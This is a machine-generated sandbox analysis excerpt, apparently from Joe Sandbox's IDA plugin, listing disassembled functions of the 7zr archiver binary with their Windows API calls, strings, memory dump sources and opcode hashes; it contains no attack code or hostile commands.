5a6ddc-5a6def call 5a2407 1610->1616 1617 5a6df1-5a6df9 call 5a3221 1610->1617 1618 5a6fda-5a6fde 1611->1618 1619 5a6fe4-5a6feb 1611->1619 1612->1611 1620 5a6f7e-5a6f8a call 5a6bf5 1612->1620 1623 5a6d7a-5a6d82 call 5a764c 1614->1623 1624 5a6d78 1615->1624 1625 5a6d6d-5a6d75 1615->1625 1616->1617 1636 5a6dfe-5a6e0b call 5a87df 1616->1636 1617->1636 1618->1619 1628 5a70e5-5a70ea call 5a6868 1618->1628 1629 5a701d-5a7024 call 5a8782 1619->1629 1630 5a6fed-5a6ff7 call 5a6bf5 1619->1630 1620->1628 1644 5a6f90-5a6f93 1620->1644 1622->1588 1648 5a7116 1623->1648 1624->1623 1625->1624 1640 5a70ef-5a70f3 1628->1640 1629->1628 1645 5a702a-5a7035 1629->1645 1630->1628 1650 5a6ffd-5a7000 1630->1650 1656 5a6e0d-5a6e10 1636->1656 1657 5a6e43-5a6e50 call 5a6c72 1636->1657 1646 5a710c 1640->1646 1647 5a70f5-5a70f7 1640->1647 1644->1628 1651 5a6f99-5a6fb6 call 5a67f0 call 5a2f88 1644->1651 1645->1628 1653 5a703b-5a7044 call 5a8578 1645->1653 1655 5a710e-5a7111 call 5a6848 1646->1655 1647->1646 1654 5a70f9-5a7102 1647->1654 1648->1595 1650->1628 1658 5a7006-5a701b call 5a67f0 1650->1658 1680 5a6fb8-5a6fbd 1651->1680 1681 5a6fc2-5a6fc5 call 5a717b 1651->1681 1653->1628 1677 5a704a-5a7054 call 5a717b 1653->1677 1654->1646 1662 5a7104-5a7107 call 5a717b 1654->1662 1655->1648 1665 5a6e1e-5a6e36 call 5a67f0 1656->1665 1666 5a6e12-5a6e15 1656->1666 1678 5a6f3a-5a6f4b call 5a1e40 * 2 1657->1678 1679 5a6e56 1657->1679 1674 5a6fca-5a6fcc 1658->1674 1662->1646 1682 5a6e58-5a6e7e call 5a2f1c call 5a2e04 1665->1682 1683 5a6e38-5a6e41 call 5a2fec 1665->1683 1666->1657 1667 5a6e17-5a6e1c 1666->1667 1667->1657 1667->1665 1674->1655 1693 5a7056-5a705f call 5a2f88 1677->1693 1694 5a7064-5a7097 call 5a2e47 call 5a1089 * 2 call 5a6868 1677->1694 1678->1587 1679->1682 1680->1681 1681->1674 1702 5a6e83-5a6e99 call 5a6bb5 1682->1702 1683->1682 1705 5a7155-5a7158 call 5a6848 1693->1705 1725 5a7099-5a70af wcscmp 1694->1725 1726 5a70bf-5a70cc call 5a6bf5 1694->1726 1709 5a6e9b-5a6e9f 1702->1709 1710 5a6ecf-5a6ed1 1702->1710 1705->1588 1712 5a6ea1-5a6eae call 5a22bf 1709->1712 1713 5a6ec7-5a6ec9 SetLastError 1709->1713 1715 5a6f09-5a6f35 call 5a1e40 * 2 call 5a6848 call 5a1e40 * 2 1710->1715 1722 5a6ed3-5a6ed9 1712->1722 1723 5a6eb0-5a6ec5 call 5a1e40 call 5a2e04 1712->1723 1713->1710 1715->1648 1732 5a6edb-5a6ee0 1722->1732 1733 5a6eec-5a6f07 call 5a31e5 1722->1733 1723->1702 1729 5a70bb 1725->1729 1730 5a70b1-5a70b6 1725->1730 1744 5a7129-5a7133 call 5a67f0 1726->1744 1745 5a70ce-5a70d1 1726->1745 1729->1726 1737 5a7147-5a7154 call 5a2f88 call 5a1e40 1730->1737 1732->1733 1739 5a6ee2-5a6ee8 1732->1739 1733->1715 1737->1705 1739->1733 1756 5a713a 1744->1756 1757 5a7135-5a7138 1744->1757 1750 5a70d8-5a70e4 call 5a1e40 1745->1750 1751 5a70d3-5a70d6 1745->1751 1750->1628 1751->1744 1751->1750 1761 5a7141-5a7144 1756->1761 1757->1761 1761->1737
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A6C77
                                        • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 005A6EC9
                                          • Part of subcall function 005A6C72: wcscmp.MSVCRT ref: 005A70A5
                                          • Part of subcall function 005A6BF5: __EH_prolog.LIBCMT ref: 005A6BFA
                                          • Part of subcall function 005A6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 005A6C1A
                                          • Part of subcall function 005A6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 005A6C49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                        • String ID: :$DATA
                                        • API String ID: 3316598575-2587938151
                                        • Opcode ID: d7407a6ba5bd9b4c4a5a8701875434e2959811b32dd5a761e2fc733b1df5e952
                                        • Instruction ID: 76a0aaac2131b263a2c748a361b22033f2f79f6cf3acb80855fc8ddbb7e865ef
                                        • Opcode Fuzzy Hash: d7407a6ba5bd9b4c4a5a8701875434e2959811b32dd5a761e2fc733b1df5e952
                                        • Instruction Fuzzy Hash: 75E1253090020A9ECF25EFA4C899BEEBFB5FF5B314F144519E8426B2D1DB71A949CB11
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B6FCA
                                          • Part of subcall function 005B6E71: __EH_prolog.LIBCMT ref: 005B6E76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                        • API String ID: 3519838083-394804653
                                        • Opcode ID: 50ee111de191bf57656f5e024e5c10bd1e7b13c5a466360a219bda52db31bff0
                                        • Instruction ID: dce87a5cff6b32a985dd76c4c005308a971d6bd7bd44db7023cef71d74f92db5
                                        • Opcode Fuzzy Hash: 50ee111de191bf57656f5e024e5c10bd1e7b13c5a466360a219bda52db31bff0
                                        • Instruction Fuzzy Hash: 4B41727290964D9FCB21EFA884549EEFFB5BF99340F54446EE086A3201C6317E44CB61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$H_prolog
                                        • String ID: =
                                        • API String ID: 2614055831-2525689732
                                        • Opcode ID: 4cb98d6b9378897e23455d153bb036383dc153ea82f01a48a8b1eec95cf4d41b
                                        • Instruction ID: 7474729f3e2a6161238a1803d249c478a23cb185db20b17c76aad8c907d2f51e
                                        • Opcode Fuzzy Hash: 4cb98d6b9378897e23455d153bb036383dc153ea82f01a48a8b1eec95cf4d41b
                                        • Instruction Fuzzy Hash: 45214D32904119ABCF15EB98E956BEDBFBAFF89310F20002BE40172291DF716E55CA95
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EBDBA
                                          • Part of subcall function 005EBE69: __EH_prolog.LIBCMT ref: 005EBE6E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: d$0d$Dd
                                        • API String ID: 3519838083-2971680969
                                        • Opcode ID: ee4a7891205a9a0447aa982c3a46a666a0c538e8cbd0c8ac7bf4fdc707332b29
                                        • Instruction ID: fcd3825afab55b0f60e0102d96005b95b91148a1be97f9336eb76fb3642487e3
                                        • Opcode Fuzzy Hash: ee4a7891205a9a0447aa982c3a46a666a0c538e8cbd0c8ac7bf4fdc707332b29
                                        • Instruction Fuzzy Hash: ED11E3B0941745CFC324DF6AC588686FFE5FB19304F50C9AED4AA8B712C7B0A948CB51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D8346
                                        • fputs.MSVCRT ref: 005D835B
                                        • fputs.MSVCRT ref: 005D8364
                                          • Part of subcall function 005D83BF: __EH_prolog.LIBCMT ref: 005D83C4
                                          • Part of subcall function 005D83BF: fputs.MSVCRT ref: 005D8401
                                          • Part of subcall function 005D83BF: fputs.MSVCRT ref: 005D8437
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$H_prolog
                                        • String ID: =
                                        • API String ID: 2614055831-2525689732
                                        • Opcode ID: a383dfedf100feebd90ce6be54794fbf0c634dcf75e218de0e0164c54f95dd25
                                        • Instruction ID: 37cc70e866a9afa710970b40e3a2237d81b325f28232d1d3019bd46e8cee5675
                                        • Opcode Fuzzy Hash: a383dfedf100feebd90ce6be54794fbf0c634dcf75e218de0e0164c54f95dd25
                                        • Instruction Fuzzy Hash: D801AD31A00409ABCB16BBA8DC1AAEEBF76FFC5710F00441AF405922A1CF754A55DBD5
                                        APIs
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,005BAB57), ref: 00637DAA
                                        • GetLastError.KERNEL32(?,00000000,005BAB57), ref: 00637DBB
                                        • CloseHandle.KERNELBASE(00000000,?,00000000,005BAB57), ref: 00637DCF
                                        • GetLastError.KERNEL32(?,00000000,005BAB57), ref: 00637DD9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseHandleObjectSingleWait
                                        • String ID:
                                        • API String ID: 1796208289-0
                                        • Opcode ID: 563874194b5921ff1789a71fd0c7a439b385ab86c43d06ff4c857cdec4171050
                                        • Instruction ID: 21077d932301e55961e19cbecb22b492cccb7b14403d129c55deec714ffdabe4
                                        • Opcode Fuzzy Hash: 563874194b5921ff1789a71fd0c7a439b385ab86c43d06ff4c857cdec4171050
                                        • Instruction Fuzzy Hash: 6CF082B170C20647EB305ABD9C84FB6A6DAAF52775F201725F420C33D0DB60CC0086A0
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00662938), ref: 005D588B
                                        • LeaveCriticalSection.KERNEL32(00662938), ref: 005D58BC
                                          • Part of subcall function 005DC911: GetTickCount.KERNEL32 ref: 005DC926
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CountEnterLeaveTick
                                        • String ID: v$8)f
                                        • API String ID: 1056156058-2823517967
                                        • Opcode ID: 2156660dc30fd84ee32dcef94aed37daf52744b9ece86fe448d33ae580d381c8
                                        • Instruction ID: da9c9236674d5307b865bbb239172dc527bdd05522dad5a4ecaa90ea0142bdbc
                                        • Opcode Fuzzy Hash: 2156660dc30fd84ee32dcef94aed37daf52744b9ece86fe448d33ae580d381c8
                                        • Instruction Fuzzy Hash: 78E0E579606211DFC318DF19E918E9A7BA6BFE9321F05056FF409C7362CB309C49CAA1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C209B
                                          • Part of subcall function 005A757D: GetLastError.KERNEL32(005AD14C), ref: 005A757D
                                          • Part of subcall function 005C2C6C: __EH_prolog.LIBCMT ref: 005C2C71
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorLastfree
                                        • String ID: Cannot find archive file$The item is a directory
                                        • API String ID: 683690243-1569138187
                                        • Opcode ID: 5285ac96c053c3cc36847300e3282c101df42ebba1c6fe078a0ee3446b9e5bd4
                                        • Instruction ID: 8dbbf7b4172d40cac983d7e904d576d5d23f5861585d03b8bd881c97057ccb06
                                        • Opcode Fuzzy Hash: 5285ac96c053c3cc36847300e3282c101df42ebba1c6fe078a0ee3446b9e5bd4
                                        • Instruction Fuzzy Hash: B1721374900259DFCB25DFA8C984BDEBFB5BF59300F14809EE859AB252CB709A81CF51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CountTickfputs
                                        • String ID: .
                                        • API String ID: 290905099-4150638102
                                        • Opcode ID: 78f6e1e7d88ad8c88f10a3bfe0cce8cf0d7f285df33072ad249a32a4ca9c843b
                                        • Instruction ID: c87684ff528e00b73b008d74f8b1260c4ea4f3587de4b80708f6ed840a6c3432
                                        • Opcode Fuzzy Hash: 78f6e1e7d88ad8c88f10a3bfe0cce8cf0d7f285df33072ad249a32a4ca9c843b
                                        • Instruction Fuzzy Hash: 66711330600B069BDB35EB68C596AAEBFE6BF82304F40491FE08797A41DB74B945CB11
                                        APIs
                                          • Part of subcall function 005A9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 005A9CB3
                                          • Part of subcall function 005A9C8F: GetProcAddress.KERNEL32(00000000), ref: 005A9CBA
                                          • Part of subcall function 005A9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 005A9CC8
                                        • __aulldiv.LIBCMT ref: 005E093F
                                        • __aulldiv.LIBCMT ref: 005E094B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                        • String ID: 3333
                                        • API String ID: 3520896023-2924271548
                                        • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                        • Instruction ID: a6b158139707f0b29382e779b5842990d61e834da88f06afd69b114dc23b725e
                                        • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                        • Instruction Fuzzy Hash: F021B5B1D007446FE734DF6A8881A5FBAF9FB84710F00892EB186D3242D670AD408BA5
                                        APIs
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        • memset.MSVCRT ref: 005CAEBA
                                        • memset.MSVCRT ref: 005CAECD
                                          • Part of subcall function 005E04D2: _CxxThrowException.MSVCRT(?,00654A58), ref: 005E04F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memset$ExceptionThrowfree
                                        • String ID: Split
                                        • API String ID: 1404239998-1882502421
                                        • Opcode ID: be75376e36bec7283b49ed0d9e94df86027b444d5fa7be85f3d17b8af741fa2c
                                        • Instruction ID: 99cad4ddf639801539219998cd0b79483e313584638b440f982ae4fad2ebce25
                                        • Opcode Fuzzy Hash: be75376e36bec7283b49ed0d9e94df86027b444d5fa7be85f3d17b8af741fa2c
                                        • Instruction Fuzzy Hash: 19423730A00249DFDF25DBA4C984BADBFB6BF45308F1440ADE549A7252CB71AE85CB52
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A759F
                                          • Part of subcall function 005A764C: CloseHandle.KERNELBASE(00000000,?,005A75AF,00000002,?,00000000,00000000), ref: 005A7657
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 005A75E5
                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 005A7626
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CreateFile$CloseH_prologHandle
                                        • String ID:
                                        • API String ID: 449569272-0
                                        • Opcode ID: 43b62df334dd346e8adc107497cab29ae6c1bb03a11138aae997177b2e9602f2
                                        • Instruction ID: f43b2e401cc6e23f5754cad00b468d330c885857c20b041e7eef70b660df306d
                                        • Opcode Fuzzy Hash: 43b62df334dd346e8adc107497cab29ae6c1bb03a11138aae997177b2e9602f2
                                        • Instruction Fuzzy Hash: 2E118C7280020EEFCF11AFA4CC419AEBF7AFF49364B008529F961521A1C7318D61DB90
                                        APIs
                                        • fputs.MSVCRT ref: 005D8437
                                        • fputs.MSVCRT ref: 005D8401
                                          • Part of subcall function 005A1FB3: __EH_prolog.LIBCMT ref: 005A1FB8
                                        • __EH_prolog.LIBCMT ref: 005D83C4
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologfputs$fputc
                                        • String ID:
                                        • API String ID: 678540050-0
                                        • Opcode ID: b5a21ead5fc29177746b54921993311d81a52ddf1b7600a9ce7b83f55e2c3ca4
                                        • Instruction ID: da42bc2bf662293c7dfe1d5b408fb7a39da673c391937e31ef29356b7b00c501
                                        • Opcode Fuzzy Hash: b5a21ead5fc29177746b54921993311d81a52ddf1b7600a9ce7b83f55e2c3ca4
                                        • Instruction Fuzzy Hash: 72118235B045069FCF09BBA4E81BAAEBF6AFFC1750F00002AF50293291DF6559458BE8
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,005A77DB,?,?,00000000,?,005A7832,?), ref: 005A7773
                                        • GetLastError.KERNEL32(?,005A77DB,?,?,00000000,?,005A7832,?,?,?,?,00000000), ref: 005A7780
                                        • SetLastError.KERNEL32(00000000,?,?,005A77DB,?,?,00000000,?,005A7832,?,?,?,?,00000000), ref: 005A7797
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FilePointer
                                        • String ID:
                                        • API String ID: 1156039329-0
                                        • Opcode ID: 467b4721cc7fc8220aee04db30319e6f1ad38c9a0632bb29deb463eca66dfe98
                                        • Instruction ID: 51c6b827febd2a3d46453bb8ffef89d0c7ec47fd5d9afff4144c66889b119056
                                        • Opcode Fuzzy Hash: 467b4721cc7fc8220aee04db30319e6f1ad38c9a0632bb29deb463eca66dfe98
                                        • Instruction Fuzzy Hash: 1D11BF35604309AFEF118F68DC45BAE3BE6FF4A320F108429F81697291D7B09D109BA0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A5A91
                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 005A5AB7
                                        • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 005A5AEC
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AttributesFile$H_prolog
                                        • String ID:
                                        • API String ID: 3790360811-0
                                        • Opcode ID: 3aa447002c2ddb2573d29ed68a074772c3e9932044263a57ed0071929cface8f
                                        • Instruction ID: 6a187ad9bb5e2a60c30561c702c84f5d4082557fb33ee4e9c7683f3a7bbdb1f6
                                        • Opcode Fuzzy Hash: 3aa447002c2ddb2573d29ed68a074772c3e9932044263a57ed0071929cface8f
                                        • Instruction Fuzzy Hash: 09012832E0061AEBCF05ABE49C81AFEBF7AFF82351F14442AED1263251DB364C01D660
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B5BEF
                                          • Part of subcall function 005B54C0: __EH_prolog.LIBCMT ref: 005B54C5
                                          • Part of subcall function 005B5630: __EH_prolog.LIBCMT ref: 005B5635
                                          • Part of subcall function 005C36EA: __EH_prolog.LIBCMT ref: 005C36EF
                                          • Part of subcall function 005B57C1: __EH_prolog.LIBCMT ref: 005B57C6
                                          • Part of subcall function 005B58BE: __EH_prolog.LIBCMT ref: 005B58C3
                                        Strings
                                        • Cannot seek to begin of file, xrefs: 005B610F
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Cannot seek to begin of file
                                        • API String ID: 3519838083-2298593816
                                        • Opcode ID: 13228bf214ee5bbae6564f44d87306bbc41bc2e4b58e0cea037fb2d65605a5fc
                                        • Instruction ID: d3597bc8c1e8cbc15544e91c5388bfc1e09736103134454ce0cdeea82c4b435c
                                        • Opcode Fuzzy Hash: 13228bf214ee5bbae6564f44d87306bbc41bc2e4b58e0cea037fb2d65605a5fc
